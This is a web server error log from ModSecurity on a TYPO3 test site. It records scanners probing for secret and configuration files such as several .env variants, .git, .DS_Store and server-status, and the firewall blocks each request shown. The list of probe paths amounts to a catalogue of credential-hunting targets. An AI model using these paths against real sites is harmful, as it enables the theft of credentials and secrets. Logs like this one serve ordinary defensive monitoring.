[Sun May 18 19:42:33.229470 2025] [:error] [pid 3249925] [client 176.98.186.46:56244] [client 176.98.186.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCocCSB18mLaGgkeaQkSNAAAAAQ"]
[Sun May 18 19:42:33.229714 2025] [:error] [pid 3249925] [client 176.98.186.46:56244] [client 176.98.186.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCocCSB18mLaGgkeaQkSNAAAAAQ"]
[Sun May 18 19:42:33.229879 2025] [:error] [pid 3249925] [client 176.98.186.46:56244] [client 176.98.186.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCocCSB18mLaGgkeaQkSNAAAAAQ"]
[Thu May 22 20:30:01.519740 2025] [authz_core:error] [pid 3341497] [client 143.244.168.161:46014] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Thu May 22 20:30:02.479411 2025] [:error] [pid 3341498] [client 143.244.168.161:46036] [client 143.244.168.161] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aC9tKsDHI1veCqFBz61kbwAAAAs"]
[Thu May 22 20:30:02.479652 2025] [:error] [pid 3341498] [client 143.244.168.161:46036] [client 143.244.168.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aC9tKsDHI1veCqFBz61kbwAAAAs"]
[Thu May 22 20:30:02.479855 2025] [:error] [pid 3341498] [client 143.244.168.161:46036] [client 143.244.168.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aC9tKsDHI1veCqFBz61kbwAAAAs"]
[Thu May 22 20:30:02.777879 2025] [:error] [pid 3341499] [client 143.244.168.161:46042] [client 143.244.168.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aC9tKvhQnin0arpgk9iaWwAAAAw"]
[Thu May 22 20:30:02.778124 2025] [:error] [pid 3341499] [client 143.244.168.161:46042] [client 143.244.168.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aC9tKvhQnin0arpgk9iaWwAAAAw"]
[Thu May 22 20:30:02.778334 2025] [:error] [pid 3341499] [client 143.244.168.161:46042] [client 143.244.168.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aC9tKvhQnin0arpgk9iaWwAAAAw"]
[Thu May 22 20:30:03.073188 2025] [authz_core:error] [pid 3341527] [client 143.244.168.161:46046] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri May 23 03:02:21.696973 2025] [:error] [pid 3348061] [client 128.192.12.126:50313] [client 128.192.12.126] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aC_JHb2tQIpCXW54HKeYSQAAAAE"]
[Fri May 23 03:02:21.697462 2025] [:error] [pid 3348061] [client 128.192.12.126:50313] [client 128.192.12.126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aC_JHb2tQIpCXW54HKeYSQAAAAE"]
[Fri May 23 03:02:21.697667 2025] [:error] [pid 3348061] [client 128.192.12.126:50313] [client 128.192.12.126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aC_JHb2tQIpCXW54HKeYSQAAAAE"]
[Fri May 23 06:44:35.431465 2025] [:error] [pid 3348127] [client 91.206.169.53:50156] [client 91.206.169.53] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aC_9M6qpgh0zmDe7Q-Y0egAAAAc"]
[Fri May 23 06:44:35.431750 2025] [:error] [pid 3348127] [client 91.206.169.53:50156] [client 91.206.169.53] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aC_9M6qpgh0zmDe7Q-Y0egAAAAc"]
[Fri May 23 06:44:35.431921 2025] [:error] [pid 3348127] [client 91.206.169.53:50156] [client 91.206.169.53] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aC_9M6qpgh0zmDe7Q-Y0egAAAAc"]
[Fri May 23 09:28:25.888099 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDAjmTp6LlXsYZigXAayjwAAAAk"]
[Fri May 23 09:28:25.888356 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDAjmTp6LlXsYZigXAayjwAAAAk"]
[Fri May 23 09:28:25.888541 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDAjmTp6LlXsYZigXAayjwAAAAk"]
[Fri May 23 09:28:25.909090 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aDAjmTp6LlXsYZigXAaykAAAAAk"]
[Fri May 23 09:28:25.909339 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aDAjmTp6LlXsYZigXAaykAAAAAk"]
[Fri May 23 09:28:25.909526 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aDAjmTp6LlXsYZigXAaykAAAAAk"]
[Fri May 23 09:28:25.929627 2025] [authz_core:error] [pid 3348252] [client 170.39.217.202:11344] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri May 23 09:28:25.950618 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDAjmTp6LlXsYZigXAaykgAAAAk"]
[Fri May 23 09:28:25.950863 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDAjmTp6LlXsYZigXAaykgAAAAk"]
[Fri May 23 09:28:25.951074 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDAjmTp6LlXsYZigXAaykgAAAAk"]
[Fri May 23 09:28:25.971737 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDAjmTp6LlXsYZigXAaykwAAAAk"]
[Fri May 23 09:28:25.971985 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDAjmTp6LlXsYZigXAaykwAAAAk"]
[Fri May 23 09:28:25.972165 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDAjmTp6LlXsYZigXAaykwAAAAk"]
[Fri May 23 09:28:25.993944 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aDAjmTp6LlXsYZigXAaylAAAAAk"]
[Fri May 23 09:28:25.994093 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aDAjmTp6LlXsYZigXAaylAAAAAk"]
[Fri May 23 09:28:25.994344 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aDAjmTp6LlXsYZigXAaylAAAAAk"]
[Fri May 23 09:28:25.994509 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aDAjmTp6LlXsYZigXAaylAAAAAk"]
[Fri May 23 09:28:26.014939 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDAjmjp6LlXsYZigXAaylQAAAAk"]
[Fri May 23 09:28:26.015170 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDAjmjp6LlXsYZigXAaylQAAAAk"]
[Fri May 23 09:28:26.015363 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDAjmjp6LlXsYZigXAaylQAAAAk"]
[Fri May 23 09:28:26.035778 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDAjmjp6LlXsYZigXAaylgAAAAk"]
[Fri May 23 09:28:26.036045 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDAjmjp6LlXsYZigXAaylgAAAAk"]
[Fri May 23 09:28:26.036310 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDAjmjp6LlXsYZigXAaylgAAAAk"]
[Fri May 23 09:28:26.056814 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDAjmjp6LlXsYZigXAaylwAAAAk"]
[Fri May 23 09:28:26.057084 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDAjmjp6LlXsYZigXAaylwAAAAk"]
